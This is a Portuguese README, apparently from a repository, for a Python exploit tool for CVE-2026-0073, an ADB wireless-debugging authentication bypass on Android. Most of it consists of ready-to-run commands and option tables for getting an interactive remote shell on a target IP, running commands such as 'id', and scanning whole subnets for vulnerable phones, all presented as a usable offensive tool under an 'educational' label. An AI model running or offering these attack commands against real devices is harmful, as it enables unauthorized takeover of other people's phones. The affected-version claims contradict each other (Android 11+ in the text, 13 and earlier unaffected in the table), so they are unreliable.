
🚀 CVE-2026-0073 - Exploit de Depuração sem Fio do Android ADB (CVSS 8.8) 🔓 Bypass de autenticação zero-click via confusão de tipo TLS. Obtenha shell interativo, execute comandos, escaneie redes. Ferramenta educacional de red team. 🐚⚡

Zero-Click | Shell Remoto | Scanner de Rede | Ferramenta Educacional de Pesquisa em Segurança
CVE-2026-0073 é uma vulnerabilidade crítica de bypass de autenticação no daemon ADB do Android que afeta a Depuração Sem Fio em dispositivos Android 11+. A falha reside na lógica de verificação de certificado TLS onde uma confusão de tipo em EVP_PKEY_cmp() permite que atacantes contornem a autenticação apresentando um certificado EC P-256 ou Ed25519 contra um dispositivo configurado com uma chave RSA.
Este PoC demonstra a vulnerabilidade apenas para pesquisa de segurança autorizada e fins educacionais.
| Versão do Android | Afetado |
|---|---|
| Android 14 | ✅ Sim |
| Android 15 | ✅ Sim |
| Android 16 | ✅ Sim |
| Android 13- | ❌ Não |
Correção: Android Security Bulletin 2026-05-01
#Basic - One Shot Exploit
python exploit.py --target 192.168.1.100
#Interactive Shell
python exploit.py -t 192.168.1.100 -i
#Execute Single Command
python exploit.py -t 192.168.1.100 -c "id" -o result.txt
#Scan Entire Network
python exploit.py --scan --interface eth0
#Manual Port + Verbose
python exploit.py -t 192.168.1.100 -p 39311 -v
#Ed25519 Certificate
python exploit.py -t 192.168.1.100 --key-type ed25519
#Non-Interactive Mode (Exit After Command)
python exploit.py -t 192.168.1.100 -c "whoami" --no-interactive
Confira meus outros repositórios de exploits:
| Recurso | Descrição |
|---|
| 🔍 Descoberta Inteligente de Portas | Escaneia automaticamente a faixa 30000-50000 + portas comuns, verifica ADB via handshake CNXN |
| 🔐 Bypass TLS 1.3 | Explora confusão de tipo em EVP_PKEY_cmp() para bypass de autenticação |
| 🎨 Suporte a Chave Dupla | Certificados EC P-256 (padrão) ou Ed25519 |
| 🐚 Shell Interativo | Acesso total ao terminal com I/O baseado em threads |
| ⚡ Modo de Comando Único | Executa um comando e sai - perfeito para scripts |
| 📡 Scanner de Rede | Escaneia toda a sub-rede em busca de dispositivos vulneráveis |
| 🔄 Tentativas Automáticas | Backoff exponencial + máximo de tentativas configurável |
| 🎯 Substituição Manual de Porta | Especifica a porta quando a descoberta automática falha |
| 📁 Captura de Saída | Salva os resultados do comando em arquivo |
| 🎨 Saída Colorida | Feedback visual profissional via colorama |
| 🪵 Depuração Detalhada | Registro detalhado para solução de problemas |
| 🔌 Suporte a Proxy | Compatibilidade com proxy HTTP/HTTPS |
| 🧵 Shell com Threads | Sessão interativa não bloqueante |
| Argumento | Curto | Padrão | Descrição |
|---|
--target | -t | None | Endereço IP do alvo |
--port | -p | Auto | Porta da Depuração Sem Fio |
--command | -c | None | Executar comando único |
--output | -o | None | Salvar saída em arquivo |
--verbose | -v | False | Ativar registro de depuração |
--interactive | -i | True | Modo de shell interativo |
--no-interactive | - | False | Sair após a execução do comando |
--scan | - | False | Escanear rede em busca de dispositivos vulneráveis |
--interface | - | None | Interface de rede para escaneamento |
--key-type | - | ec | Tipo de certificado (ec ou ed25519) |
--max-retries | - | 3 | Número máximo de tentativas |
--no-auto-port | - | False | Desativar descoberta automática de porta |